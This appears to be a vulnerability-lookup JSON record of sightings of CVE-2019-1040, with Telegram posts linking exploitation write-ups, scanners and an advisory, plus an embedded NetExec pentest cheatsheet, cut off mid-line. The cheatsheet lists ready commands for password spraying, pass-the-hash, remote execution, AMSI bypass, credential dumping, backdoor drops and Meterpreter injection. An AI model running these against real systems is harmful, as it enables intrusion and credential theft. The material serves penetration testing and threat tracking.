{"vulnerability": "CVE-2019-1040", "sightings": [{"uuid": "74a5b66c-4724-47cb-ae51-45330b47bbbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "seen", "source": "MISP/5f850411-c103-491f-abff-9421425403cf", "content": "", "creation_timestamp": "2020-10-21T08:19:11.000000Z"}, {"uuid": "18f50f2a-b188-42d3-b4e4-bb42b1e88175", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "seen", "source": "MISP/42d04e94-bf5b-427d-acc8-f5d740675941", "content": "", "creation_timestamp": "2020-10-20T15:57:21.000000Z"}, {"uuid": "5e9aad42-8682-49ba-9164-9d994820e01e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "seen", "source": "MISP/d925a2ee-e7cf-46f6-bec1-ad8e19122730", "content": "", "creation_timestamp": "2020-10-20T15:58:04.000000Z"}, {"uuid": "4b5fc099-b423-4ad8-97cf-60015135ec24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2019-1040", "type": "seen", "source": "https://gist.github.com/Darksidesfear/97c95439522b3c4dec1538398066aa8f", "content": "", "creation_timestamp": "2025-05-04T11:34:03.000000Z"}, {"uuid": "83cbb3c7-f24f-434b-8afb-850a5ca83439", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "published-proof-of-concept", "source": "https://t.me/antichat/5409", "content": "Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin\nhttps://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/", "creation_timestamp": "2019-06-14T12:15:26.000000Z"}, {"uuid": 
"3bc3a082-297f-4893-bb7b-d6666b952593", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "seen", "source": "https://gist.github.com/strikoder/99635df00444bbf5fc90ca83ec8051a0", "content": "", "creation_timestamp": "2025-12-01T12:02:42.000000Z"}, {"uuid": "f8e31699-1acf-4b13-9399-8e00ad6e0a84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "published-proof-of-concept", "source": "Telegram/6ozsUPZBjsDLdZG63vMadgqko_WpCCgDVLV4ovLlz1dO__U", "content": "", "creation_timestamp": "2025-12-07T03:00:05.000000Z"}, {"uuid": "2b3b0f38-caa5-49db-8a95-121744fca736", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "published-proof-of-concept", "source": "https://t.me/antichat/5859", "content": "https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/", "creation_timestamp": "2019-07-14T08:50:16.000000Z"}, {"uuid": "eaed2013-1e61-4bd1-8480-9daaacf6d250", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "published-proof-of-concept", "source": "https://t.me/YouPentest/5564", "content": "Kerberos. Using Windows authentication protocols in penetration testing.\n\n00:00 Video outline\n00:20 How Kerberos works\n01:55 TGT\n08:20 TGS\n14:19 Golden ticket, ntds.dit, krbtgt\n23:02 Silver ticket\n25:15 Kerberoasting\n32:45 AS-REQ Roasting\n36:30 AS-REP Roasting\n43:15 About SPNs\n47:27 Delegation\n49:20 Unconstrained delegation, printer bug and DCSync\n57:35 DCSync and Rubeus\n01:06:50 Unconstrained delegation Pro tip\n01:11:05 Constrained delegation\n01:14:01 S4U2Self and S4U2Proxy\n01:21:50 Protected users. Account is sensitive and cannot be delegated\n01:24:19 'Forwardable' ticket flag\n01:32:37 Resource-based constrained delegation\n01:47:20 NTLM relay attack. NTLMrelayx and Rubeus\n01:58:50 MS Exchange Pro tip\n02:03:19 CVE-2019-1040\n02:06:06 LDAP signing\n02:12:25 Constrained delegation (continued)\n02:15:36 NTLM relay attack, Resource-based constrained delegation and LDAP signing (continued)\n02:17:07 SPN (continued)\n02:18:59 NTLMrelayx and secondary DNS (continued)\n\nhttps://www.youtube.com/watch?v=qZPvgoUzCdI\n\n#video #infosec #cybersecurity #pentesting #kerberos #ad", "creation_timestamp": "2024-02-26T16:38:10.000000Z"}, {"uuid": "5dde8526-5897-4672-baa1-6c1eeda15108", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "seen", "source": "https://t.me/is_n3ws/36", "content": "The NSA analyzed attacks by Chinese government hackers and released a report. Top 20 exploited vulnerabilities.\n\nhttps://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF\n\nGaining Remote Access: \n-----------------------------\nCVE-2019-11510: Arbitrary file read/Pulse Secure VPN\nCVE-2019-19781: RCE/Citrix ADC\nCVE-2020-8195/3/6: Unauthenticated access\nCVE-2019-0708: RCE on RDP server\nCVE-2020-5902: RCE in F5 BIG-IP\n\nAD:\n----\nCVE-2020-1472: #ZeroLogon\nCVE-2019-1040: NTLM relay bypass\n\nMDM: \n------\nCVE-2020-15505: MobileIron device management\n\nExploiting Public Facing Services:\n---------------- \nCVE-2020-1350: RCE/ DNS Servers #SigRed\nCVE-2018-6789: RCE/ Exim mail transfer\nCVE-2018-4939: RCE/ Adobe's Cold Fusion\n\nWorkstation Local Privilege Escalation:\n-------------------------\nCVE-2020-0601: ECC spoofing #CurveBall\nCVE-2019-0803: Win32k Elevation of Privilege\n\nInternal Applications:\n--------------------\nCVE-2020-0688: RCE/MS Exchange\nCVE-2020-2555: RCE/Oracle Weblogic\nCVE-2019-11580: RCE/Atlassian Crowd\nCVE-2019-18935: RCE/ASP.Net\nCVE-2015-4852: RCE/Apache\nCVE-2019-3396: Unauthorized Access/Confluence\nCVE-2020-10189: RCE/Desktop Central", "creation_timestamp": "2020-11-06T22:00:17.000000Z"}, {"uuid": "2aa6ac98-9fde-4c35-b078-a9dcfe08ba95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "published-proof-of-concept", "source": "https://t.me/mis_team/97", "content": "CVE-2019-1040\n\nFor the past few days everyone has been discussing the CVE-2019-1040 vulnerability and the patch from Microsoft.\n\nIf you don't know anything about it yet, here is the rundown.\nThe trick is in NTLM. It turns out that, because the authenticity check can be bypassed when using NTLM, SMB authentication can be relayed to LDAP. The result is RCE as SYSTEM on the machine.\n\nHow to exploit: functionality was added to ntlmrelayx that lets you exploit the vulnerability if it has not been patched.\n\nFor defenders: there is a patch, and it needs to be installed as soon as possible.\n\nFor pentesters and red teams: first of all, check whether the updates are installed. If the update is missing, you have found an easy way to take over the company.\n\nhttps://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/", "creation_timestamp": "2019-06-15T11:10:30.000000Z"}, {"uuid": "08b6ffef-18e6-4c7d-b947-3d6e50456f09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/256", "content": "#tools\n#Blue_Team_Techniques\nCVE-2019-1040 Scanner\nhttps://github.com/fox-it/cve-2019-1040-scanner\n// Checks for CVE-2019-1040 vulnerability over SMB", "creation_timestamp": "2023-09-08T08:46:43.000000Z"}, {"uuid": "b2f11ce7-282a-4396-a814-113b99134767", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "seen", "source": "Telegram/0sD_EyHySREvSWLaWKL-XHqTqDduPkHhIy1vEKF4pCPQbv8", "content": "", "creation_timestamp": "2020-10-28T02:58:38.000000Z"}, {"uuid": "17ac5c03-df72-47fa-ac38-4debb71501fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "published-proof-of-concept", "source": "Telegram/VhpI9vwSnkp5aTH5NVtKHmjw7iSFjGG8mVB-6en3z_Pvdw", "content": "", "creation_timestamp": "2020-05-06T15:39:23.000000Z"}, {"uuid": "c28420a6-bc59-43ca-be5b-3090219cfe3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": 
"published-proof-of-concept", "source": "https://t.me/canyoupwnme/5627", "content": "Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin\nhttps://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/", "creation_timestamp": "2019-06-14T09:16:51.000000Z"}, {"uuid": "2fff2381-9a71-4f6f-8330-d8b4d77efadc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/797", "content": "#tools\n#Blue_Team_Techniques\nNTLM Scanner \u2060- tool to check servers/hosts for various known NTLM vulnerabilities over SMB:   CVE-2019-1019, CVE-2019-1040, CVE-2019-1166, CVE-2019-1338...\nhttps://github.com/preempt/ntlm-scanner", "creation_timestamp": "2024-10-10T02:52:34.000000Z"}, {"uuid": "0f61b486-9ed8-4b99-9164-245dea0af5bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/283", "content": "#Research\n\"RAMBleed attack (CVE-2019-1040)\", 2019.\nhttps://www.documentcloud.org/documents/6150180-RamBleed-attack-CVE-2019-0174.html", "creation_timestamp": "2020-12-20T13:44:57.000000Z"}, {"uuid": "12094871-72d6-4b98-8244-bfddd372978b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/301", "content": "#Offensive_security\n1. Magento 2.3.1: \nUnauthenticated Stored XSS to RCE\nhttps://blog.ripstech.com/2019/magento-rce-via-xss\n2. 
Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin\nhttps://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin", "creation_timestamp": "2022-02-17T07:26:31.000000Z"}, {"uuid": "352f0041-f84e-4ab7-90eb-52d0133c8f08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "seen", "source": "https://t.me/GithubRedTeam/85109", "content": "\ud83d\udea8 GitHub monitoring alert\n\n\ud83d\udea8 Keywords matched: #Exploit #CVE\n\n\ud83d\udce6 Project name: PrintSpoofer-ReflectiveDLL\n\ud83d\udc64 Project author: JonyFilc\n\ud83d\udee0 Language: C\n\u2b50 Stars: 1  |  \ud83c\udf74 Forks: 3\n\ud83d\udcc5 Updated: 2026-05-20 22:59:37\n\n\ud83d\udcdd Project description:\nThe Windows Print Spooler privilege escalation vulnerability (CVE-2019-1040/CVE-2019-1019) has been implemented as a Reflective DLL for penetration testing.\n\n\ud83d\udd17 Click to visit the project", "creation_timestamp": "2026-05-20T23:02:57.000000Z"}, {"uuid": "654967e3-b3f1-44dc-84b4-5ef2aee1f4ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/284", "content": "#Red_Team_Tactics\n1. Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin\nhttps://blog.preempt.com/drop-the-mic\n2. 
Coding a reliable CVE-2019-084 bypass\nhttps://0x00-0x00.github.io/research/2019/05/30/Coding-a-reliable-CVE-2019-0841-Bypass.html", "creation_timestamp": "2023-10-26T20:37:33.000000Z"}, {"uuid": "0397a52b-1a52-42cd-a991-455073480e1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "exploited", "source": "https://t.me/suboxone_chatroom/132", "content": "Both Falcon identity protection modules provide Active Directory attack detections:\n\u2022 Account enumeration reconnaissance (BloodHound, Kerberoasting)\n\u2022 Bronze Bit (CVE-2020-17049)\n\u2022 Brute force attacks (LDAP simple bind, NTLM, Kerberos)\n\u2022 Credential scanning (on-premises)\n\u2022 Cloud-based (Azure AD) brute-force/credentials scanning\n\u2022 DCSync \u2014 Active Directory replication\n\u2022 DCShadow\n\u2022 Forged PAC for privilege escalation (Bulletin MS-14-068)\n\u2022 Golden Ticket\n\u2022 Hidden object detected\n\u2022 NTLM Relay Attack (including MS Exchange)\n\u2022 Overpass-the-Hash (Multiple methods - Mimikatz, CrackMapExec)\n\u2022 Pass-the-Hash (Impacket, CrackMapExec, Metasploit)\n\u2022 Pass-the-Ticket\n\u2022 Possible exploitation attempt (CredSSP) CVE-2018-0886\n\u2022 Remote execution attempts\n\u2022 Skeleton Key and Mimikatz Skeleton Key\n\u2022 Suspected NTLM authentication tampering (CVE-2019-1040)\n\u2022 ZeroLogin (CVE-2020-1472)", "creation_timestamp": "2024-12-27T11:55:02.000000Z"}, {"uuid": "f76f1f39-6330-41cf-8345-5bc0ec7ce807", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2019-1040", "type": "seen", "source": "https://gist.github.com/Porkballs/df8b4b4e30522a04debf3644594d1535", "content": "# NXC (NetExec) Cheatsheet\n\nComplete reference for NetExec (NXC) - the network execution tool for pentesting\n\n> **Version Note**: This cheatsheet is based on the 
latest NetExec version. Always check `nxc  --help` and `nxc  -L` for your specific version.\n\n## Installation\n```bash\npipx install netexec\n# or\napt install netexec\n```\n\n## Basic Syntax\n\n`nxc   -u  -p  / -H  [flags] -M  -o `\n\n---\n\n## Protocols Overview\n\n- `smb` - SMB/CIFS (Port 445)\n- `ldap` - LDAP (Port 389/636)\n- `winrm` - WinRM (Port 5985/5986)\n- `ssh` - SSH (Port 22)\n- `rdp` - RDP (Port 3389)\n- `mssql` - Microsoft SQL Server (Port 1433)\n- `ftp` - FTP (Port 21)\n- `wmi` - WMI (Port 135)\n- `vnc` - VNC (Port 5900)\n- `nfs` - NFS (Port 111)\n\n---\n\n## Target Specification\n```bash\nnxc smb 192.168.1.10                    # Single host\nnxc smb 192.168.1.0/24                  # CIDR range\nnxc smb 192.168.1.1-100                 # Range\nnxc smb targets.txt                     # File with targets (one per line)\n```\n\n---\n\n## Password Spraying\n\n### Pattern: protocol targets.txt users.txt passwords.txt\n\n```bash\n# Domain authentication (default)\nnxc smb targets.txt -u users.txt -p passwords.txt -d DOMAIN\n\n# Local authentication\nnxc smb targets.txt -u users.txt -p passwords.txt --local-auth\n\n# Continue on success (don't stop after first valid)\nnxc smb targets.txt -u users.txt -p passwords.txt --continue-on-success\n\n# Stop on first success per target\nnxc smb targets.txt -u users.txt -p passwords.txt --no-bruteforce\n\n# Single password spray (safer for avoiding lockouts)\nnxc smb targets.txt -u users.txt -p 'Password123!' 
-d DOMAIN --continue-on-success\n\n# With jitter to avoid detection\nnxc smb targets.txt -u users.txt -p passwords.txt --jitter 5\n\n# Fail limit options\nnxc smb targets.txt -u users.txt -p passwords.txt --gfail-limit 10     # Global fail limit\nnxc smb targets.txt -u users.txt -p passwords.txt --ufail-limit 3      # Per-user fail limit\nnxc smb targets.txt -u users.txt -p passwords.txt --fail-limit 5       # Per-host fail limit\n```\n\n---\n\n## No Authentication\n\n```bash\n# Null session (empty username)\nnxc smb 192.168.1.10 -u '' -p ''\n\n# Guest account\nnxc smb 192.168.1.10 -u 'guest' -p ''\n\n# Anonymous LDAP bind\nnxc ldap 192.168.1.10 -u '' -p ''\n\n# Enumerate without credentials\nnxc smb 192.168.1.0/24 --gen-relay-list relay.txt    # SMB signing check\n```\n\n---\n\n## Authentication Methods\n\n### Username and Password\n```bash\nnxc smb 192.168.1.10 -u admin -p 'password'\nnxc smb 192.168.1.10 -u admin -p 'password' -d DOMAIN\nnxc smb 192.168.1.10 -u admin -p 'password' --local-auth\n```\n\n### Pass-the-Hash\n```bash\nnxc smb 192.168.1.10 -u admin -H \nnxc smb 192.168.1.10 -u admin -H \nnxc smb 192.168.1.10 -u admin -H  -d DOMAIN\n```\n\n### Kerberos Authentication\n```bash\n# With password\nnxc smb 192.168.1.10 -u admin -p 'password' -d DOMAIN -k\n\n# Using cached ticket (ccache)\nnxc smb 192.168.1.10 -u admin --use-kcache -k\n\n# With AES key\nnxc smb 192.168.1.10 -u admin --aesKey  -k\n\n# Specify KDC\nnxc smb 192.168.1.10 -u admin -p 'password' -d DOMAIN -k --kdcHost dc01.domain.local\n```\n\n### Certificate Authentication\n```bash\n# PFX certificate\nnxc smb 192.168.1.10 --pfx-cert cert.pfx --pfx-pass password\n\n# PEM certificate\nnxc smb 192.168.1.10 --pem-cert cert.pem --pem-key key.pem\n```\n\n---\n\n## SMB Protocol (Port 445)\n\n### Basic Enumeration (No Auth)\n```bash\nnxc smb 192.168.1.0/24                              # Check SMB version, signing\nnxc smb 192.168.1.0/24 --gen-relay-list relay.txt  # Find relay targets\n```\n\n### 
Enumeration (With Auth)\n```bash\nnxc smb 192.168.1.10 -u user -p pass --shares              # List shares\nnxc smb 192.168.1.10 -u user -p pass --shares --filter-shares read,write  # Filter by access\nnxc smb 192.168.1.10 -u user -p pass --dir \"C$\"            # List directory contents\nnxc smb 192.168.1.10 -u user -p pass --users               # Enumerate users\nnxc smb 192.168.1.10 -u user -p pass --users --enabled     # Only enabled users\nnxc smb 192.168.1.10 -u user -p pass --users-export out.txt  # Export users to file\nnxc smb 192.168.1.10 -u user -p pass --groups              # Enumerate groups\nnxc smb 192.168.1.10 -u user -p pass --computers           # Enumerate computers\nnxc smb 192.168.1.10 -u user -p pass --local-groups        # Local groups\nnxc smb 192.168.1.10 -u user -p pass --pass-pol            # Password policy\nnxc smb 192.168.1.10 -u user -p pass --smb-sessions        # Active SMB sessions\nnxc smb 192.168.1.10 -u user -p pass --disks               # Enumerate disks\nnxc smb 192.168.1.10 -u user -p pass --interfaces          # Network interfaces\nnxc smb 192.168.1.10 -u user -p pass --loggedon-users      # Logged on users\nnxc smb 192.168.1.10 -u user -p pass --rid-brute           # RID cycling\nnxc smb 192.168.1.10 -u user -p pass --qwinsta             # RDP connections\nnxc smb 192.168.1.10 -u user -p pass --tasklist            # Running processes\n```\n\n### WMI Queries\n```bash\nnxc smb 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Process\"\nnxc smb 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Service\" --wmi-namespace \"root\\cimv2\"\n```\n\n### Spidering Shares\n```bash\nnxc smb 192.168.1.10 -u admin -p pass --spider C$\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --spider-folder Users\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --pattern password\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --regex \".*\\.txt$\"\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --content       # Search 
file content\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --depth 3       # Max recursion depth\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --only-files    # Files only\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --exclude-dirs Windows,System32\n```\n\n### Command Execution\n```bash\nnxc smb 192.168.1.10 -u admin -p pass -x \"whoami\"                    # CMD\nnxc smb 192.168.1.10 -u admin -p pass -X '$PSVersionTable'           # PowerShell\nnxc smb 192.168.1.10 -u admin -p pass --exec-method smbexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --exec-method atexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --exec-method wmiexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --exec-method mmcexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --no-output -x \"command\"       # Don't retrieve output\n```\n\n### PowerShell Options\n```bash\nnxc smb 192.168.1.10 -u admin -p pass -X '$PSVersionTable' --obfs          # Obfuscate\nnxc smb 192.168.1.10 -u admin -p pass -X 'command' --amsi-bypass bypass.ps1\nnxc smb 192.168.1.10 -u admin -p pass -X 'command' --force-ps32            # Force 32-bit\nnxc smb 192.168.1.10 -u admin -p pass -X 'command' --no-encode             # Don't encode\nnxc smb 192.168.1.10 -u admin -p pass --clear-obfscripts                   # Clear cache\n```\n\n### File Operations\n```bash\nnxc smb 192.168.1.10 -u admin -p pass --get-file \"\\\\Windows\\\\Temp\\\\file.txt\" ./local.txt\nnxc smb 192.168.1.10 -u admin -p pass --put-file ./payload.exe \"\\\\Windows\\\\Temp\\\\payload.exe\"\nnxc smb 192.168.1.10 -u admin -p pass --get-file \"\\\\file.txt\" ./out.txt --append-host\n```\n\n### Credential Dumping\n```bash\n# SAM Database\nnxc smb 192.168.1.10 -u admin -p pass --sam                        # Default method\nnxc smb 192.168.1.10 -u admin -p pass --sam secdump                # Using secdump\nnxc smb 192.168.1.10 -u admin -p pass --sam regdump                # Using regdump\n\n# LSA Secrets\nnxc 
smb 192.168.1.10 -u admin -p pass --lsa                        # Default method\nnxc smb 192.168.1.10 -u admin -p pass --lsa secdump                # Using secdump\nnxc smb 192.168.1.10 -u admin -p pass --lsa regdump                # Using regdump\n\n# NTDS (Domain Controller)\nnxc smb dc01.domain.local -u admin -p pass --ntds                  # Default (drsuapi)\nnxc smb dc01.domain.local -u admin -p pass --ntds vss              # Using VSS\nnxc smb dc01.domain.local -u admin -p pass --ntds drsuapi          # Using drsuapi\nnxc smb dc01.domain.local -u admin -p pass --ntds --user admin     # Specific user\nnxc smb dc01.domain.local -u admin -p pass --ntds --enabled        # Enabled accounts only\n\n# DPAPI\nnxc smb 192.168.1.10 -u admin -p pass --dpapi                      # Dump DPAPI\nnxc smb 192.168.1.10 -u admin -p pass --dpapi cookies              # Include cookies\nnxc smb 192.168.1.10 -u admin -p pass --dpapi nosystem             # Exclude SYSTEM\nnxc smb 192.168.1.10 -u admin -p pass --dpapi --mkfile masterkeys.txt\nnxc smb 192.168.1.10 -u admin -p pass --dpapi --pvk backupkey.pvk\n\n# SCCM\nnxc smb 192.168.1.10 -u admin -p pass --sccm                       # Default (wmi)\nnxc smb 192.168.1.10 -u admin -p pass --sccm wmi                   # Using WMI\nnxc smb 192.168.1.10 -u admin -p pass --sccm disk                  # Using disk\n```\n\n### SMB Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\n# Vulnerability Checks\nnxc smb 192.168.1.10 -u user -p pass -M ms17-010                   # EternalBlue\nnxc smb 192.168.1.10 -u user -p pass -M zerologon                  # CVE-2020-1472\nnxc smb 192.168.1.10 -u user -p pass -M nopac                      # CVE-2021-42278/42287\nnxc smb 192.168.1.10 -u user -p pass -M printnightmare             # PrintNightmare\nnxc smb 192.168.1.10 -u user -p pass -M remove-mic                 # CVE-2019-1040\nnxc smb 192.168.1.10 -u user -p pass -M smbghost                   # CVE-2020-0796\nnxc smb 192.168.1.10 -u user -p pass -M 
coerce_plus                # Coercion vulns\nnxc smb 192.168.1.10 -u user -p pass -M timeroast                  # Timeroasting\n\n# Enumeration\nnxc smb 192.168.1.10 -u user -p pass -M enum_av                    # AV products\nnxc smb 192.168.1.10 -u user -p pass -M enum_ca                    # ADCS CAs\nnxc smb 192.168.1.10 -u user -p pass -M ioxidresolver              # Additional interfaces\nnxc smb 192.168.1.10 -u user -p pass -M spooler                    # Print spooler\nnxc smb 192.168.1.10 -u user -p pass -M webdav                     # WebClient service\nnxc smb 192.168.1.10 -u user -p pass -M spider_plus                # Spider shares\nnxc smb 192.168.1.10 -u user -p pass -M spider_plus -o READ_ONLY=false\n\n# Password Hunting\nnxc smb 192.168.1.10 -u user -p pass -M gpp_password               # GPP passwords\nnxc smb 192.168.1.10 -u user -p pass -M gpp_autologin              # GPP autologin\n\n# Backdoors\nnxc smb 192.168.1.10 -u user -p pass -M drop-sc                    # Drop searchConnector\nnxc smb 192.168.1.10 -u user -p pass -M scuffy                     # Drop .scf files\nnxc smb 192.168.1.10 -u user -p pass -M slinky                     # Create LNK backdoors\n\n# Computer Management\nnxc smb 192.168.1.10 -u user -p pass -M add-computer               # Add/delete computer\nnxc smb 192.168.1.10 -u user -p pass -M backup_operator            # Backup operator exploit\n```\n\n#### HIGH PRIVILEGE MODULES (requires admin)\n```bash\n# Credential Dumping\nnxc smb 192.168.1.10 -u admin -p pass -M lsassy                    # LSASS dump\nnxc smb 192.168.1.10 -u admin -p pass -M nanodump                  # Alternative LSASS\nnxc smb 192.168.1.10 -u admin -p pass -M procdump                  # Process dump\nnxc smb 192.168.1.10 -u admin -p pass -M handlekatz                # Handle dump\nnxc smb 192.168.1.10 -u admin -p pass -M dpapi_hash                # DPAPI masterkeys\nnxc smb 192.168.1.10 -u admin -p pass -M hash_spider               # Recursive 
LSASS\nnxc smb 192.168.1.10 -u admin -p pass -M ntdsutil                  # NTDS with ntdsutil\n\n# Application Credentials\nnxc smb 192.168.1.10 -u admin -p pass -M keepass_discover          # Find KeePass\nnxc smb 192.168.1.10 -u admin -p pass -M keepass_trigger           # KeePass trigger\nnxc smb 192.168.1.10 -u admin -p pass -M mobaxterm                 # MobaXterm creds\nnxc smb 192.168.1.10 -u admin -p pass -M mremoteng                 # mRemoteNG creds\nnxc smb 192.168.1.10 -u admin -p pass -M putty                     # PuTTY keys\nnxc smb 192.168.1.10 -u admin -p pass -M rdcman                    # RDCMan creds\nnxc smb 192.168.1.10 -u admin -p pass -M winscp                    # WinSCP creds\nnxc smb 192.168.1.10 -u admin -p pass -M vnc                       # VNC passwords\nnxc smb 192.168.1.10 -u admin -p pass -M wifi                      # WiFi passwords\nnxc smb 192.168.1.10 -u admin -p pass -M veeam                     # Veeam DB creds\nnxc smb 192.168.1.10 -u admin -p pass -M msol                      # Azure AD Connect\nnxc smb 192.168.1.10 -u admin -p pass -M teams_localdb             # Teams SSO cookie\nnxc smb 192.168.1.10 -u admin -p pass -M wam                       # Token Broker Cache\n\n# Enumeration\nnxc smb 192.168.1.10 -u admin -p pass -M enum_dns                  # DNS records (WMI)\nnxc smb 192.168.1.10 -u admin -p pass -M get_netconnections        # Network connections\nnxc smb 192.168.1.10 -u admin -p pass -M bitlocker                 # BitLocker status\nnxc smb 192.168.1.10 -u admin -p pass -M hyperv-host               # HyperV host\nnxc smb 192.168.1.10 -u admin -p pass -M iis                       # IIS app pool creds\nnxc smb 192.168.1.10 -u admin -p pass -M install_elevated          # AlwaysInstallElevated\nnxc smb 192.168.1.10 -u admin -p pass -M ntlmv1                    # NTLMv1 enabled\nnxc smb 192.168.1.10 -u admin -p pass -M runasppl                  # RunAsPPL status\nnxc smb 192.168.1.10 -u admin -p pass -M uac          
             # UAC status\nnxc smb 192.168.1.10 -u admin -p pass -M wcc                       # Security config\nnxc smb 192.168.1.10 -u admin -p pass -M security-questions        # Security Q&A\n\n# File Operations\nnxc smb 192.168.1.10 -u admin -p pass -M notepad++                 # Unsaved files\nnxc smb 192.168.1.10 -u admin -p pass -M powershell_history        # PS history\nnxc smb 192.168.1.10 -u admin -p pass -M recent_files              # Recent files\nnxc smb 192.168.1.10 -u admin -p pass -M snipped                   # Snipping Tool\n\n# Persistence & Execution\nnxc smb 192.168.1.10 -u admin -p pass -M empire_exec               # Empire agent\nnxc smb 192.168.1.10 -u admin -p pass -M met_inject                # Meterpreter\nnxc smb 192.168.1.10 -u admin -p pass -M web_delivery              # Web delivery\nnxc smb 192.168.1.10 -u admin -p pass -M impersonate               # Token impersonation\nnxc smb 192.168.1.10 -u admin -p pass -M pi                        # Process injection\nnxc smb 192.168.1.10 -u admin -p pass -M schtask_as                # Scheduled task\n\n# Configuration Changes\nnxc smb 192.168.1.10 -u admin -p pass -M rdp -o ACTION=enable      # Enable RDP\nnxc smb 192.168.1.10 -u admin -p pass -M rdp -o ACTION=disable     # Disable RDP\nnxc smb 192.168.1.10 -u admin -p pass -M shadowrdp                 # Shadow RDP\nnxc smb 192.168.1.10 -u admin -p pass -M wdigest -o ACTION=enable  # Enable WDigest\nnxc smb 